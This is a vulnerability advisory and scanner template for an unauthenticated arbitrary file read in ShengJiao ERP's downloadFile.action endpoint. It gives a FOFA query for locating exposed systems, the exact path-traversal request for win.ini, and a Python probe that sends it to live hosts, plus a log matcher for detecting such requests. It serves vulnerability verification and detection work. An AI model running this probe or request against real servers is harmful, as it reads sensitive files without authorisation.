Vulnerability description
The downloadFile.action endpoint of the ShengJiao ERP System has an arbitrary file read vulnerability: the request in the check below passes absolutePath=true together with an absolute file path and receives the contents of c:\windows\win.ini.
Unauthenticated attackers can exploit it to read arbitrary files on the server, including sensitive system and configuration files.
FOFA: app="圣乔-ERP系统"
id: shengjiao-erp-downloadfile-fileread
info:
  name: ShengJiao ERP downloadFile.action Arbitrary File Read
  author: ZacharyZcR
  severity: high
  verified: false
  description: |
    The downloadFile.action endpoint of the ShengJiao ERP System has an arbitrary file read vulnerability.
    Unauthenticated attackers can exploit it to read arbitrary files on the server.
    FOFA: app="圣乔-ERP系统"
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%9C%A3%E4%B9%94ERP/%E5%9C%A3%E4%B9%94ERP%E7%B3%BB%E7%BB%9FdownloadFile.action%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: shengqiao,erp,lfi,fileread
  created: 2024/12/31
rules:
  r0:
    request:
      method: GET
      path: /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\\win.ini
    expression: response.status == 200 && response.body.bcontains(b'for 16-bit app support')
expression: r0()
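The following is an added example, not code from the wy876/POC repository, the afrog project, or the ShengJiao ERP vendor. It re-implements the template's probe and match expression in Python and adds an access-log matcher for the same request pattern; the host name, ports and log lines in it are constructed for illustration. Two practical caveats it encodes: the request path contains a literal `../` segment, so the client must send it unnormalised (with curl, use `--path-as-is`), and the probe targets `c:\windows\win.ini`, so the match string only ever confirms Windows hosts; a Linux deployment would not be detected by this check even if the endpoint behaves the same way. The log matcher is deliberately broader than the single request in the template, flagging any downloadFile.action request that uses absolutePath=true, a dot-dot segment, or an absolute or traversing file value.

```python
"""Added example, not code from the wy876/POC page or the ShengJiao ERP
product: re-implements the afrog template's probe and match logic and adds an
access-log matcher for the same request pattern. Host names, ports and log
lines below are constructed for illustration."""
import http.client
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request exactly as written in the template (raw string keeps the doubled
# backslashes of the unquoted YAML scalar). The "../" segment must reach the
# server unnormalised, and win.ini exists only on Windows, so MARKER never
# fires on a Linux deployment even if the endpoint is vulnerable there.
PROBE_PATH = r"/erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\\win.ini"
MARKER = b"for 16-bit app support"  # text present in a stock Windows win.ini


def matches(status: int, body: bytes) -> bool:
    """The template's r0 expression: HTTP 200 and the win.ini marker in the body."""
    return status == 200 and MARKER in body


def send_probe(host: str, port: int = 80, tls: bool = False, timeout: float = 10.0):
    """Send PROBE_PATH verbatim. http.client writes the request line as given;
    a client that resolves dot segments would request /erp/downloadFile.action
    instead and not reproduce the template's request."""
    conn_cls = http.client.HTTPSConnection if tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("GET", PROBE_PATH, headers={"User-Agent": "Mozilla/5.0"})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def check_target(host: str, port: int = 80, tls: bool = False) -> bool:
    """True when a live target answers the probe the way the template expects."""
    status, body = send_probe(host, port, tls)
    return matches(status, body)


# ---- detection side: flag the same request pattern in access logs ----------

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ABS_PATH_RE = re.compile(r"^(?:[A-Za-z]:[\\/]|[\\/])")  # c:\..., /..., \...


def is_probe_request(target: str) -> bool:
    """Flag downloadFile.action requests using the page's technique:
    absolutePath=true, a dot-dot segment in the URL path, or a file value that
    is an absolute path or contains '..' (broader than the template's one URL)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not path.lower().endswith("/downloadfile.action"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs URL-decodes values
    if qs.get("absolutePath", [""])[0].lower() == "true":
        return True
    if "/../" in path or "\\..\\" in path:
        return True
    file_value = qs.get("file", [""])[0]
    return bool(ABS_PATH_RE.match(file_value)) or ".." in file_value


def scan_log(lines):
    """Return flagged entries; a 200 on the probe means the read most likely succeeded."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe_request(m["target"]):
            hits.append({"ip": m["ip"], "target": m["target"], "status": int(m["status"])})
    return hits


# Constructed sample log in combined format (documentation IP ranges).
SAMPLE_LOG = [
    r'203.0.113.10 - - [31/Dec/2024:10:15:02 +0800] "GET /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\\win.ini HTTP/1.1" 200 403',
    r'203.0.113.10 - - [31/Dec/2024:10:15:09 +0800] "GET /erp/wap/login.action HTTP/1.1" 200 5120',
    r'198.51.100.7 - - [31/Dec/2024:10:16:44 +0800] "GET /erp/downloadFile.action?file=c:%5Cwindows%5Csystem.ini HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} status={hit['status']} {hit['target']}")
    # Live check against a hypothetical host (not run here):
    # print(check_target("erp.example.com", 80))
```

Running the script on the constructed log reports the first and third lines; only the first carries a 200, which is the case worth treating as a confirmed read rather than an attempt. For a live check, `check_target` applies exactly the template's condition, so a `False` on a Linux host says nothing about the endpoint.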